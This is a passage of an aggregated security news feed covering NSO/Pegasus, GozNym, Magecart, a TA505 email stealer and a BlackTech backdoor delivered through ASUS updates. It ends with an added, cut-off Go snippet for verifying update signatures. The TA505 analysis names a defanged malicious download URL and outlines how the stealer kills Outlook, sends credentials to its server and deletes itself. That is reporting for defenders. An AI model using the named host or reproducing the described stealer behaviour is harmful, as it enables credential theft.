Technical information about the above feature was also shared by the ThyssenKrupp CERT, whose experts released an Nmap script that can be used to identify Winnti infections through network scanning.

“An expansion into Linux tooling indicates iteration outside of their traditional comfort zone. This may indicate the OS requirements of their intended targets but it may also be an attempt to take advantage of a security telemetry blindspot in many enterprises, as is with Penquin Turla and APT28’s Linux XAgent variant.” concludes the report, which includes IoCs and Yara rules for the identification of the threat.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Winnti, Linux malware)

The post Chronicle experts spotted a Linux variant of the Winnti backdoor appeared first on Security Affairs.

Amnesty International filed a lawsuit against Israeli surveillance firm NSO

Amnesty International filed a lawsuit against Israeli surveillance firm NSO and fears its staff may be targeted by the company with its Pegasus spyware.

The name NSO Group made the headlines last week after the disclosure of the WhatsApp flaw exploited by the company to remotely install its surveillance software.

The Israeli firm is now facing a lawsuit backed by Amnesty International; the non-governmental organization fears its staff may be under surveillance via spyware delivered by exploiting the WhatsApp issue.

The lawsuit was filed in Israel by about 50 members and supporters of the human rights group. The organization calls on the Israeli ministry of defence to ban the export of the Pegasus surveillance software developed by NSO Group.

“An affidavit from Amnesty is at the heart of the case, and concludes that “staff of Amnesty International have an ongoing and well-founded fear they may continue to be targeted and ultimately surveilled” after a hacking attempt last year.” reads the post published by The Guardian.

“The Israeli government’s Defence Export Controls Agency has failed to exercise proper oversight “despite serious allegations of abuse”, the affidavit claimed, adding: “Because of DECA’s inaction, NSO Group can continue to sell its software to governments known to target human rights defenders.””

Officially, the sale of the surveillance software is limited to authorized governments, to support agencies investigating criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

In July, Citizen Lab collected evidence of attacks against 175 targets worldwide carried out with the NSO spyware. Citizen Lab uncovered other attacks against individuals in Qatar and Saudi Arabia, where the Israeli surveillance software is becoming very popular.

In August, an Amnesty International report confirmed that its experts identified a second human rights activist, in Saudi Arabia, who was targeted with the powerful spyware.

According to Joshua Franco, Amnesty’s head of technology and human rights, the trade in surveillance software is going out of control.

In August, the human rights group published a report that provides details on the attack against an employee at Amnesty International. The hackers attempted to compromise the mobile device of a staff member in early June by sending him a WhatsApp message about a protest in front of the Saudi Embassy in Washington.


The organization added that this kind of attack is becoming more frequent, with a growing amount of Israeli surveillance software being used to spy on human rights workers and opposition figures in the Middle East and beyond.

Amnesty International traced the malicious link in the message to the surveillance network of the Israeli firm NSO Group.

The Guardian reported that NSO Group already faced many other lawsuits, such as the one backed by Omar Abdulaziz, a Saudi dissident based in Montreal. In December Abdulaziz filed a lawsuit in Israel in which he claimed that his phone was infected with the NSO spyware when he was in regular contact with the journalist Jamal Khashoggi.

In November, Snowden warned of abuse of surveillance software that also had a role in the murder of the Saudi Arabian journalist Jamal Khashoggi.

Khashoggi is believed to have been killed by Saudi Arabia’s agents, and the country licensed NSO software in 2017, paying $55m for the technology.

NSO said it wants to demonstrate that it is not involved in any abuse of its technology; it prepared a 26-page report to reply to the accusations made by Amnesty and Citizen Lab.

It is curious that in early 2019 a majority stake in NSO was acquired by the London-based firm Novalpina Capital, founded by the banker and philanthropist Stephen Peel.

The Guardian reported an excerpt of the reply to Amnesty, signed by Peel, that states that in “almost all” the cases of complaints of human rights abuse raised, the alleged victim of hacking had not been a target or the government in question had acted with “due lawful authority”.

“We believe that the reality is different. We’ve seen them target human rights organisations and no evidence they’ve been able to effectively control governments when complaints have been raised.” replied Danna Ingleton, the deputy director of Amnesty’s technology division.


Pierluigi Paganini

(SecurityAffairs – NSO Group, Amnesty International)

The post Amnesty International filed a lawsuit against Israeli surveillance firm NSO appeared first on Security Affairs.

Ransomware and malware attacks decline, attackers adopting covert tactics

There has been a major decline in ransomware and malware attacks, with Ireland having some of the lowest rates globally, according to the latest report released by Microsoft. This is a significant change from 2017, following a prolific series of attacks that targeted supply chains globally. Initial predictions were that these would increase, however, improvements in cybersecurity measures and detection have impacted on the success rates of these attacks. In fact, there has been a … More

The post Ransomware and malware attacks decline, attackers adopting covert tactics appeared first on Help Net Security.

Ireland And Its Evolving Cybersecurity Issues

Ireland in 2018 experienced a huge decline in malware infections, and in particular far fewer cases of ransomware compared to 2017. The European country of almost 5 million people mirrors the global trend, as cybercriminals are heavily transitioning from disruptive and destructive ransomware to silent yet very profitable phishing and cryptojacking. Ireland recorded a monthly infection rate of just 1.26% in 2018, one of the lowest in the European region and one of the lowest globally.

This is a sharp contrast to 2017, when millions of computers worldwide were heavily infected by ransomware, most notably WannaCry and NotPetya. Cryptojacking is easy to deploy and very difficult to detect, since it is basically a program that consumes CPU/GPU resources like any other program on a computing device. But the consumed CPU/GPU resources do not produce a tangible output as a typical benign program would; instead the program is designed to compute crypto-hashes in an attempt to mine cryptocurrency.

“While we have seen a welcome drop in ransomware and malware attacks, it would be a mistake to assume the level of the cyber threat to Irish organizations has also decreased. We are seeing major behavioral change amongst criminal hackers, who want access to a victim’s computer and an organization’s network to access data, but also use their computing power to mine for cryptocurrency. This is about playing the long game and exploiting people’s lack of training and understanding when it comes to cybercrime. Microsoft’s analysts predict phishing will continue to be an issue for the foreseeable future for that reason,” explained Des Ryan, Microsoft Ireland’s Solutions Director.

To add insult to injury, Microsoft underscored that many private and public entities in the country lack adequate staff training when it comes to cybersecurity. The vulnerable companies also practice lax IT security protocols, a trait that allows a single thing going wrong to grow into a much larger incident.


The post Ireland And Its Evolving Cybersecurity Issues appeared first on .

Law Enforcement Operation Dismantles GozNym Banking Malware

An international law enforcement operation has led to the dismantling of the global cybercrime network that used the GozNym banking malware to steal money from bank accounts across the world.

TechCrunch reports, “Europol and the U.S. Justice Department, with help from six other countries, have disrupted and dismantled the GozNym malware, which they say stole more than $100 million from bank accounts since it first emerged.”

Prosecutors have stated, in a press conference held in The Hague, that ten defendants in five countries have been charged with using the GozNym malware to steal money from over 41,000 victims, including business and financial institutions. Of these ten people, five have been arrested in Moldova, Ukraine, Bulgaria, and Russia while the remaining five, all Russians, are on the run. The leader of the cybercrime network and his technical assistant are being prosecuted in Georgia.

TechCrunch security editor Zack Whittaker writes, “All were charged with conspiracy to commit computer fraud, conspiracy to commit wire and bank fraud and conspiracy to commit money laundering. An eleventh member of the conspiracy, Krasimir Nikolov, was previously charged and extradited to the U.S. in 2016 and pleaded guilty in April in his role in the GozNym malware network.”

He adds, “The takedown was described as an “unprecedented international effort” by Scott Brady, U.S. attorney for Western Philadelphia — where a grand jury indicted the defendants — at the press conference announcing the charges.”

The victims of the GozNym attacks have not been named, but it’s reported that in the U.S. at least 11 businesses, including two law firms and a casino, plus a church, have been impacted.

The banking malware GozNym was developed from two existing malware families (Gozi and Nymaim) and spread across the U.S., Germany, Poland and Canada. It first emerged in 2016 and has hit dozens of banks and credit unions since then. The leader of the cybercrime network behind GozNym had built it from the code of the two malware families, both of which had their source code leaked years earlier. He then recruited accomplices and advertised GozNym on Russian-speaking forums.

The TechCrunch report explains how GozNym, which is described as malware “as a service”, works: “The malware used encryption and other obfuscation techniques to avoid detection by antivirus tools. Then, spammers are said to have sent hundreds of thousands of phishing emails to infect staff at businesses and banks. After the malware infected its victim computers, the malware would steal the passwords control of bank accounts, which the criminals would later log in and cash out.”

The report further says that according to prosecutors, the GozNym network was “hosted and operated through a bulletproof service, a domain and web hosting known for lax attitudes toward cybercrime and favored by criminals.”

An administrator of the “Avalanche” network, an infrastructure platform which provided services to over 200 cybercriminals and which was dismantled in 2016 during a German-led operation, had also provided bulletproof hosting services to the GozNym network. This administrator would also face prosecution in Ukraine (where his apartment is located) for his role in providing bulletproof hosting services to the GozNym network.


The post Law Enforcement Operation Dismantles GozNym Banking Malware appeared first on .

Security Affairs newsletter Round 214 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy


Hacking the ‘Unhackable’ eyeDisk USB stick
Security breach suffered by credit bureau Equifax has cost $1.4 Billion
Turkish Personal Data Protection Authority fined Facebook for Photo API bug
CVE-2019-11815 Remote Code Execution affects Linux Kernel prior to 5.0.8
Expert discovered how to brick all Samsung mobile phones
Facebook sues data analytics firm Rankwave over alleged data misuse
Over 10k+ GPS trackers could be abused to spy on individuals in the UK
Pacha Group declares war to rival crypto mining hacking groups
Reading the Yoroi Cyber Security Annual Report 2018
Malware Training Sets: FollowUP
Millions of computers powered by Intel chips are affected by MDS flaws
North Korea-linked ScarCruft APT adds Bluetooth Harvester to its arsenal
Thrangrycat flaw could allow compromising millions of Cisco devices
Unprotected DB exposed PII belonging to nearly 90% of Panama citizens
WhatsApp zero-day exploited in targeted attacks to deliver NSO spyware
Adobe patches over 80 flaws in Flash, Acrobat Reader, and Media Encoder
Microsoft Patch Tuesday addresses dangerous RDS flaw that opens to WannaCry-like attacks
SAP Security Patch Day for May 2019 fixes many missing authorization checks
Twitter inadvertently collected and shared iOS location data
A flaw in Google Titan Security Keys expose users to Bluetooth Attacks
A joint operation by international police dismantled GozNym gang
BlackTech espionage group exploited ASUS update process to deliver Plead Backdoor
Google ‘0Day In the Wild’ project tracks zero-days exploited in the Wild
Magecart hackers inject card Skimmer in Forbes Subscription Site
Microsoft renewed its Attack Surface Analyzer, version 2.0 is online
Past, present, and future of the Dark Web
The stealthy email stealer in the TA505 hacker group’s arsenal
A flaw in Slack could allow hackers to steal, manipulate downloaded files
Chinese state-sponsored hackers breached TeamViewer in 2016
Cisco addressed a critical flaw in networks management tool Prime Infrastructure
Stack Overflow Q&A platform announced a data breach
XSS flaw in WordPress Live Chat Plugin lets attackers compromise WP sites
Dozens of Linksys router models leak data useful for hackers
Facebook banned Archimedes Group, misinformation made in Israel
Number of hacktivist attacks declined by 95 percent since 2015
Unistellar attackers already wiped over 12,000 MongoDB databases

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 214 – News of the week appeared first on Security Affairs.

May I have a word about… Pegasus spyware | Jonathan Bouquet

Is the powerful virus that infected WhatsApp a flying horse or a Trojan horse? Don’t ask the woman who developed it

The unsavoury revelations about the hacking of WhatsApp by software developed by Israeli company, NSO Group, raised some interesting imagery. NSO has developed a powerful smartphone virus called Pegasus, described by NSO co-founder Shalev Hulio as the company’s Trojan horse that could be sent “flying through the air” to infiltrate devices.

Right, let’s get this straight. Pegasus was the son of mortal Medusa and Poseidon, god of the sea. Pegasus and his brother Chrysaor were born from the blood of their beheaded mother, who was tricked and killed by Perseus. Pegasus was represented as a kind-hearted, gentle creature, somewhat naive but always eager to help.


Israeli firm linked to WhatsApp spyware attack faces lawsuit

Amnesty International fears its staff may be ‘surveilled via NSO Pegasus software’

The Israeli firm linked to this week’s WhatsApp hack is facing a lawsuit backed by Amnesty International, which says it fears its staff may be under surveillance from spyware installed via the messaging service.


Cyber News Rundown: WhatsApp Vulnerability Could Install Spyware


WhatsApp Exploited to Install Spyware through Calls

A serious flaw has been discovered in the messaging app WhatsApp that would allow an attacker to install spyware on a victim’s device by manipulating the packets being sent during the call. Further disguising the attack, the malicious software could be installed without the victim answering the call, and with access to the device the attacker could also delete the call log. Fortunately, the Facebook-owned app was quick to respond and quickly released an update for affected versions. 

SIM Swapping Group Officially Charged

Nine men in their teens and 20s have been arrested and charged for a SIM-swapping operation that netted the group over $2 million in stolen cryptocurrency. The group operated by illicitly gaining access to phone accounts and having the victim’s number swapped to a SIM card under their control. The group would then fraudulently access cryptocurrency accounts by bypassing two-factor authentication, since login codes were sent to devices under their control. Three of the group were former telecom employees with access to the systems needed to execute the scam.

Web Trust Seal Injected with Keylogger

A recent announcement revealed that scripts for the “Trust Seals” provided by Best of the Web to highly-rated websites were compromised and modified to capture keystrokes from site visitors. While Best of the Web was quick to resolve the issue, at least 100 sites are still linking customers to the compromised seals. This type of supply chain attack has risen in popularity recently: hackers have been seen injecting payment-stealing malware into several large online retailers’ websites since the beginning of the year.

Fast Retailing Data Breach

The online vendor Fast Retailing is currently investigating a data breach that gave attackers full access to nearly half a million customer accounts for two of the brand’s online stores. The attack took place within the last three weeks and targeted payment information with names and addresses for customers of UNIQLO Japan and GU Japan. Fast Retailing has since forced a password reset for all online customers and delivered emails with further information for those affected by the attack.

Data Leak in Linksys Routers

Last week researchers discovered a flaw in over 25,000 Linksys routers that could give attackers access to not only the device’s MAC address, but also device names and other critical settings that could compromise the security of anyone using the router. Additionally, by identifying the device’s IP address, attackers could even use geolocation to gauge the approximate location of the exploited device, all without authentication.

The post Cyber News Rundown: WhatsApp Vulnerability Could Install Spyware appeared first on Webroot Blog.

Memory analysis is the ground truth

In recent years, enterprises have adopted next-gen endpoint protection products that are doing an admirable job detecting anomalies. For example, searching for patterns such as remote access to memory, modification of specific registry keys and alerting on other suspicious activities. However, typically anomalies only provide us with an indication that something is wrong. In order to understand the root problem, respond and ensure that a machine is entirely clean, we must search for the malicious … More

The post Memory analysis is the ground truth appeared first on Help Net Security.

Laptop Running Six Most Dangerous Malware up for Auction

This is news! A laptop containing six of the most dangerous malware strains created to date is up for auction.

A Samsung NC10-14GB 10.2-Inch Blue Netbook, which contains six such malware strains which together have caused damages worth $95B over the years, has been put up for auction. This laptop has in fact been isolated and airgapped so as to prevent the spread of the malware that it contains. (Well, we know that if you are an expert, you might be cynical about the effectiveness of airgapping; but technically speaking, it’s supposed to help curb the spread of malware!).

It’s illegal to sell malware for operational purposes in the U.S. The seller of the malware-packed laptop, as per reports, has devised a way to get around this issue by calling it art. This laptop, which runs on Windows XP SP3, is now called ‘The Persistence of Chaos’.

A Forbes report dated May 15, 2019, says, “The singular laptop is an air-gapped Samsung NC10-14GB 10.2-Inch Blue Netbook (2008) running Windows XP SP3 and loaded with the malware and restart script. It also comes with a power cord, just in case the 11-year-old battery isn’t still holding a viable charge.” The report further adds, “It’s currently sitting on a white cube in a room somewhere in New York City and is being sold under the guise of art as “The Persistence of Chaos”. It’s certainly subversive and skirts the legalities of selling malware (it’s illegal to sell for operational purposes), but hey, anarchy is entertaining.”

The infected laptop is a creation of performance artist Guo O Dong in collaboration with cybersecurity company Deep Instinct. Curtis Silver, who has authored the Forbes report, has quoted Guo O Dong as telling him via email, “I created The Persistence of Chaos because I wanted to see how the world responds to and values the impact of malware.”

The six strains of malware that the laptop contains are:

WannaCry – The ransomware that spread all across the world and made a devastating impact on over 200,000 computers across over 150 countries.

Mydoom – The fastest-spreading email worm to date, Mydoom was first seen in January 2004 and worked mainly by sending junk email through infected computers while appearing as a transmission error.

Sobig – First detected infecting computer systems in August 2003, this malware, which is both a worm and a trojan, is the second-fastest-spreading worm as of 2018. It deactivated itself in September 2003.

BlackEnergy – The malware that was first seen in 2007 and then worked by generating bots for executing DDoS attacks that were distributed via email spam. At a later stage of evolution, it would drop an infected DLL component directly to the local application data folder.

ILOVEYOU – This malware, which spread through an email attachment named ‘LOVE-LETTER-FOR-YOU.txt.vbs’, was sent from an infected person to the people in his contact list. Once the attachment is opened, a script starts that overwrites files of various types: Office files, audio files, image files, etc. It has been seen since May 2000.

DarkTequila – This malware, which has been active since 2013 and seen impacting systems in Latin America, spreads through spear phishing and infected USB drives. Hackers use DarkTequila to steal corporate data, bank credentials, and personal data as well.

Curtis Silver observes in his Forbes report, “On a base level the goal if we believe light grey text on a white background, is to sell this malware infused laptop under the blanket of art for academic purposes. On a deeper level, it’s a statement of social anarchy, of controlled chaos and an exposé of how fragile our machine-connected lives really are.”

This is a very relevant observation, because a laptop like this (if it really carries all the malware it claims to) is, in all respects, a worrying thing.


The post Laptop Running Six Most Dangerous Malware up for Auction appeared first on .

More Attacks against Computer Automatic Update Systems

Last month, Kaspersky discovered that Asus's live update system was infected with malware, an operation it called Operation Shadowhammer. Now we learn that six other companies were targeted in the same operation.

As we mentioned before, ASUS was not the only company used by the attackers. Studying this case, our experts found other samples that used similar algorithms. As in the ASUS case, the samples were using digitally signed binaries from three other Asian vendors:

  • Electronics Extreme, authors of the zombie survival game called Infestation: Survivor Stories,
  • Innovative Extremist, a company that provides Web and IT infrastructure services but also used to work in game development,
  • Zepetto, the South Korean company that developed the video game Point Blank.

According to our researchers, the attackers either had access to the source code of the victims' projects or they injected malware at the time of project compilation, meaning they were in the networks of those companies. And this reminds us of an attack that we reported on a year ago: the CCleaner incident.

Also, our experts identified three additional victims: another video gaming company, a conglomerate holding company and a pharmaceutical company, all in South Korea. For now we cannot share additional details about those victims, because we are in the process of notifying them about the attack.

Me on supply chain security.

A joint operation by international police dismantled GozNym gang

A joint effort by international law enforcement agencies from six different countries has dismantled the crime gang behind the GozNym banking malware.

The GozNym banking malware is considered one of the most dangerous threats to the banking industry; experts estimate it was used to steal nearly $100 million from over 41,000 victims across the globe over the years.

“An unprecedented, international law enforcement operation has dismantled a complex, globally operating and organised cybercrime network.” reads the press release published by the Europol. “The criminal network used GozNym malware in an attempt to steal an estimated $100 million from more than 41 000 victims, primarily businesses and their financial institutions.”


The GozNym banking malware was first spotted in April 2015 by researchers from IBM X-Force Research; it combines features of the Gozi ISFB and Nymaim malware.

GozNym has been seen targeting banking institutions, credit unions, and retail banks. Among the victims of the GozNym Trojan are 24 financial institutions in North America and organizations in Europe, including Polish webmail service providers, investment banking and consumer accounts at 17 banks in Poland and one bank in Portugal.

Now Europol has announced the unprecedented international law enforcement operation that dismantled the complex, globally operating and organised cybercrime network.

Europol, with the help of law enforcement agencies from Bulgaria, Germany, Georgia, Moldova, Ukraine, and the United States, identified ten individuals alleged to be members of the GozNym network.

Five defendants were arrested during several coordinated searches conducted in Bulgaria, Georgia, Moldova, and Ukraine; the remaining ones are Russian citizens and are still on the run, including the expert who developed the banking malware.

The cybercrime organization has been described by the Europol as a highly specialised and international criminal network.

One of the members, who encrypted the GozNym malware to avoid detection by security solutions, was arrested and is being prosecuted in the Republic of Moldova.

Operators behind the GozNym malware used the Avalanche network to spread the malware.

“Bulletproof hosting services were provided to the GozNym criminal network by an administrator of the “Avalanche” network. The Avalanche network provided services to more than 200 cybercriminals, and hosted more than twenty different malware campaigns, including GozNym.” continues the press release published by Europol. “Through the coordinated efforts being announced today, this alleged cybercriminal is now facing prosecution in Ukraine for his role in providing bulletproof hosting services to the GozNym criminal network. The prosecution will be conducted by the Prosecutor General’s Office of Ukraine and the National Police of Ukraine.”

The members of the gang used banking malware to infect victims’ computers and steal their online banking credentials.

“A criminal Indictment returned by a federal grand jury in Pittsburgh, USA charges ten members of the GozNym criminal network with conspiracy to commit the following:

  • infecting victims’ computers with GozNym malware designed to capture victims’ online banking login credentials;
  • using the captured login credentials to fraudulently gain unauthorised access to victims’ online bank accounts;
  • stealing money from victims’ bank accounts and laundering those funds using U.S. and foreign beneficiary bank accounts controlled by the defendants.

The defendants are well known in the Russian underground; they advertised their specialized technical skills and services in Russian-speaking online criminal forums. Through these forums the leader of the GozNym network recruited them.

“The leader of the GozNym criminal network, along with his technical assistant, are being prosecuted in Georgia by the Prosecutor’s Office of Georgia and the Ministry of Internal Affairs of Georgia.” continues the Europol press release.

Below the advisory published by the FBI:


Pierluigi Paganini

(SecurityAffairs – GozNym, malware)

The post A joint operation by international police dismantled GozNym gang appeared first on Security Affairs.

Forbes subscribers warned of Magecart threat skimming credit card details

The notorious Magecart malware, that blights online stores by stealing payment card details from unsuspecting shoppers at checkout, has claimed another high profile victim. Security researcher Troy Mursch raised the alarm on Twitter that the Forbes magazine subscription website had been compromised with malicious code that was siphoning off sensitive credit card information as users […]… Read More

The post Forbes subscribers warned of Magecart threat skimming credit card details appeared first on The State of Security.

The stealthy email stealer in the TA505 hacker group’s arsenal

Experts at Yoroi-Cybaze Z-Lab observed a spike in attacks against the banking sector and spotted a new email stealer used by the TA505 hacker group


Over the last month, our Threat Intelligence surveillance team spotted increasing evidence of an intensification of operations against the banking sector. Many independent researchers pointed to a particular email attack wave, probably related to the known TA505 hacking group, which has been active since 2014 and focuses on retail and banking companies. The group is also known for the evasive techniques it has put in place over time to avoid security controls and penetrate corporate perimeters with several kinds of malware, for instance abusing so-called LOLBins (Living Off The Land Binaries), legitimate programs regularly used by the victim, or abusing validly signed payloads.

Figure 1. Attack campaign spotted in the wild.

Investigating and tracking their operations during April and May, we detected an interesting tool delivered to the victim machine. Just after the opening of the malicious documents and the installation of FlawedAmmyy RAT implants, the group deployed a particular credential-stealing tool, part of its arsenal, which revealed details of its recent operation.

Figure 2. Attack campaign spotted in the wild.

Technical Analysis

The piece of malware under analysis was downloaded from “bullettruth[.com/out[.exe” and executed on the victim machines after the infection had been established.

Threat: Custom Email Stealer
Brief Description: Executable of the email stealer
Figure 3: Malware Signature by SLON LTD

Firstly, we noticed that this secondary component was well protected against antivirus detection: the PE file was signed in the first half of May by Sectigo, one of the major Russian Certification Authorities. Analyzing the trust chain, we found the attackers were relying on cryptographic keys issued to a UK company named SLON LTD. At this time, we have no evidence either way on whether that company was itself the victim of a previous compromise.

Anyway, a static inspection of the binary revealed that the malware has a quite high entropy level, suggesting it may be packed.

Figure 4: Malware suspicious entropy level

Executing the malware dynamically reveals more about its behaviour. The executable is essentially an email stealer: its only purpose is to retrieve all the email accounts and passwords present on the victim machine. After running its information-gathering routine, the malware sends all the retrieved emails and passwords to its C2:

Figure 5: HTTP POST communication

The interesting thing about the communication with the C2 is that there is no encryption: the harvested data are sent to the C2 in JSON format. Investigating the attacker infrastructure through our Digital Surveillance systems, we also uncovered interesting information about the stolen emails.

In order to retrieve more details about this Email Stealer, the analysis has moved into debugging and disassembling. As previously mentioned, the malware sample is heavily obfuscated and packed. However, by letting the malware execute itself within a debugger, we were able to extract the unpacked payload of the malware.

Figure 6: Static information about the packed sample (on the left) and the unpacked one (on the right)

As shown in the figure above, the two components differ in a notable way: the packed sample was compiled with Microsoft Visual C++ version 6.0, while the unpacked one was compiled with Microsoft Visual C++ version 8. At this point we deepened the analysis of the extracted payload. However, we were not able to execute it, because it references many memory addresses of the original process, so we carried on with static analysis of the extracted sample.

As previously described, the malware’s principal purpose is to iterate through the filesystem looking for email accounts. The first step is to check whether the “outlook.exe” process is running and, if so, to kill it: the malware iterates through user processes with the Process32FirstW API and then terminates the match with TerminateProcess:

Figure 7: Outlook process search routine

The extracted payload does not present any kind of code obfuscation; in fact, the C2 server and the path are not even encoded:

Figure 8: C2 connection routine

The last routine being analyzed is the credential harvesting inside the entire filesystem.

Apart from the routine that searches for the email accounts registered in the Outlook and Thunderbird clients (shown in Figure 7), there is another one that scans the filesystem for hardcoded extensions; whenever a matching file is found, a reference to it is kept inside the %TEMP% directory. At this point all the gathered email accounts are sent to the server, after which the malware erases all traces of itself from the infected machine: it creates a simple batch script that deletes the malware and all tracks of the infection.

Figure 9: Autodeletion batch script

Analysis of Exposed Emails

This section shows some statistics about the emails harvested in the attack campaign, recovered during surveillance and hunting operations. We built a graph sorting the most frequent TLD occurrences across all the stolen data.

Figure 10: Distribution of TLD

As seen in the graph above, the most frequent TLD is .com with 193.194 occurrences, followed by .kr with 102.025 occurrences, .cn with 26.160 occurrences, .it with 6.317 occurrences and so on. To better visualize the macro-locations involved in this exposure, we built a heatmap showing the geographical distribution of the top 100 countries referenced in the TLDs.

Figure 11: Geolocation of emails TLD exposure

The heatmap shows the less-affected countries in greenish colours, while the most-affected ones tend towards orange or red. The first thing that emerges from these two distributions is that this specific threat does not seem to be targeted: the diffusion is almost global, with red or orange zones in the UK, Italy, Republic of Korea, China, Germany, Hungary, Taiwan, Japan, India and Mexico. All these countries exceeded a thousand occurrences.


Nowadays, email accounts are an effective source of revenue for cybercriminals. All this information can be used to spread other malware through phishing campaigns, to perform BEC (Business Email Compromise) attacks and also to attempt credential stuffing attacks.

Even a simple info-stealer like this one can be a dangerous threat, especially when used by organized groups in conjunction with other malware implants. In fact, as also reported by the independent researcher Germán Fernández Bacian, this email stealer has recently been used by the infamous TA505 hacking group. This link means, with good confidence, that the exposed data, full email accounts in some cases and email contacts in general, are now available to a cybercriminal group that launched targeted attacks against banks and the retail industry in the recent past.

Technical details, including IoCs and Yara Rules, are available in the analysis published on the Yoroi blog.


Pierluigi Paganini

(SecurityAffairs – TA505, malware)

The post The stealthy email stealer in the TA505 hacker group’s arsenal appeared first on Security Affairs.

Magecart hackers inject card Skimmer in Forbes Subscription Site

The Magecart gang made the headlines again, the hackers this time compromised the Forbes magazine subscription website.

The Magecart group is back: this time the hackers compromised the Forbes magazine subscription website and injected a skimmer script into it.

The malicious traffic was spotted on Wednesday by the security expert Troy Mursch, Chief Research Officer of Bad Packets.


Magecart hackers installed a malicious JavaScript skimmer on the site to siphon off payment card data entered by subscribers. The crooks injected obfuscated JavaScript into the HTML code of the payment section; the decoded script is here.

The expert immediately attempted to report his discovery to Forbes via email, but without success.

The payment page was taken down at around 1400 UTC and it is still offline at the time of writing.

A Forbes spokesperson told El Reg that the company is investigating the incident and that, at this stage, it is not aware of the theft of any customers’ credit card information. Recent subscribers should remain vigilant and check their credit card statements for signs of fraudulent activity.

Forbes was likely the victim of a supply chain attack: the Magecart hackers had compromised a company that provides services to the media outlet.

During the weekend, the forensic expert Willem de Groot discovered that the records of customers of Picreel, a web marketing software supplier, had been leaked online.

Forbes is one of the customers of Picreel, and Magecart hackers used the leaked data to access Forbes infrastructure and install the skimmer script.

“Last weekend, security researchers surfaced new supply-chain attacks involving Magecart web-skimmers placed on several web-based suppliers, including AdMaxim, CloudCMS, and Picreel. The breaches were part of a large-scale attack that hit a breadth of providers simultaneously intending to access as many websites as possible.” reads the analysis published by RiskIQ.

Thousands of other companies that are customers at Picreel are at risk, potentially affected domains are listed here.

Security firms have monitored the activities of at least a dozen Magecart groups since 2015. The gangs implant skimming scripts into compromised online stores in order to steal payment card data, but they are quite different from each other.

According to a joint report published by RiskIQ and FlashPoint in March, some groups are more advanced than others. The list of victims of Magecart groups is long and includes several major platforms such as British Airways, Newegg, Ticketmaster, and Feedify.

Recently the Magecart group stole payment card details from the e-commerce system used by colleges and universities in Canada and the US.

Pierluigi Paganini

(SecurityAffairs – Magecart, Forbes)

The post Magecart hackers inject card Skimmer in Forbes Subscription Site appeared first on Security Affairs.

BlackTech espionage group exploited ASUS update process to deliver Plead Backdoor

The BlackTech cyber-espionage group exploited the ASUS update process for WebStorage application to deliver the Plead backdoor.

The cyber espionage group tracked as BlackTech compromised the ASUS update process for WebStorage application to deliver the Plead backdoor.

The BlackTech group was first observed by ESET in July 2018, when it was abusing code-signing certificates stolen from D-Link to distribute the Plead backdoor, which has been in the wild since at least 2012.

According to the experts, the cyber espionage group is highly skilled and most of its victims are in the East Asia region, particularly Taiwan.

At the end of April 2019, experts from ESET observed multiple attempts to deploy the Plead backdoor. In the attacks observed by the researchers, the Plead backdoor was created and executed by a legitimate process named AsusWSPanel.exe, which belongs to the Windows client for a cloud storage service called ASUS WebStorage. The executable file used in the attack is digitally signed by ASUS Cloud Corporation.

Experts noticed that all observed samples of the Plead backdoor had the file name ‘Asus Webstorage Upate.exe.’ They discovered that, during the software update process, the AsusWSPanel.exe module of ASUS WebStorage can create files with such filenames.

Threat actors might have had access to the update mechanism, a circumstance that suggests two attack scenarios:

  • the hackers compromised the supply chain of the ASUS WebStorage cloud service;
  • the hackers were in a position to carry out a MITM attack, given that WebStorage binaries are delivered via HTTP during the update process.

Experts believe the second scenario is more plausible: updates for the ASUS WebStorage software are not delivered over a secure connection, and the update process does not validate the downloaded binaries.

“The ASUS WebStorage software is vulnerable to a man-in-the-middle attack (MitM).” reads the advisory published by ESET. “Namely, the software update is requested and transferred using HTTP; once an update is downloaded and ready to execute, the software doesn’t validate its authenticity before execution. Thus, if the update process is intercepted by attackers, they are able to push a malicious update.”

Experts from ESET noticed that most of the affected organizations have routers made by the same vendor and their admin panels are exposed online. It is likely that attackers compromised the routers to carry out a MitM attack.

Plead backdoor

In the ASUS WebStorage update mechanism, the client sends a request to the server asking for an update; the server responds in XML format, with a guid and a link included in the response. The software then checks whether the installed version is older, based on the information in the guid element, and requests the update binary via the provided link.

“Therefore, attackers could trigger the update by replacing these two elements using their own data. This is the exact scenario we actually observed in the wild. Attackers inserted a new URL, which points to a malicious file at a compromised domain,” says ESET.

The attackers serve a Plead sample that acts as a first-stage downloader, fetching a fav.ico file from a server whose name mimics the official ASUS WebStorage server. The downloaded file contains a PNG image and data used by the malware, located right after the PNG data.

The second-stage loader writes itself to the Start Menu startup folder to gain persistence. The loader executes shellcode in memory to load the third-stage DLL, TSCookie.

“We see that supply-chain and man-in-the-middle attacks are used more and more often by various attackers all around the globe.” ESET concludes. “This is why it’s very important for software developers not only to thoroughly monitor their environment for possible intrusions, but also to implement proper update mechanisms in their products that are resistant to MitM attacks.”
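As an added example (not ESET’s or ASUS’s code), the update flow described above written in Go the way ESET’s conclusion asks for: the client parses the guid/link reply, refuses anything but https on a pinned host, and verifies an Ed25519 signature over the downloaded binary before handing it back for execution. The sig element, the integer build number in guid, the host name and the sample bytes are assumptions of this example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/hex"
	"encoding/xml"
	"errors"
	"fmt"
	"net/url"
	"strconv"
	"strings"
)

// UpdateInfo holds the guid and link elements ESET describes, plus a sig
// element added for this example: a hex Ed25519 signature over the binary.
type UpdateInfo struct {
	XMLName xml.Name `xml:"update"`
	GUID    string   `xml:"guid"`
	Link    string   `xml:"link"`
	Sig     string   `xml:"sig"`
}

var (
	ErrInsecureLink = errors.New("update link must be https on the vendor host")
	ErrBadSignature = errors.New("update binary failed signature verification")
)

// CheckLink refuses the plain-HTTP transport ESET observed and pins the host,
// so a MitM cannot simply swap in a link to a domain it controls.
func CheckLink(link, vendorHost string) error {
	u, err := url.Parse(link)
	if err != nil {
		return err
	}
	if u.Scheme != "https" || !strings.EqualFold(u.Hostname(), vendorHost) {
		return ErrInsecureLink
	}
	return nil
}

// VerifyBinary is the step the vulnerable client skipped: nothing runs until
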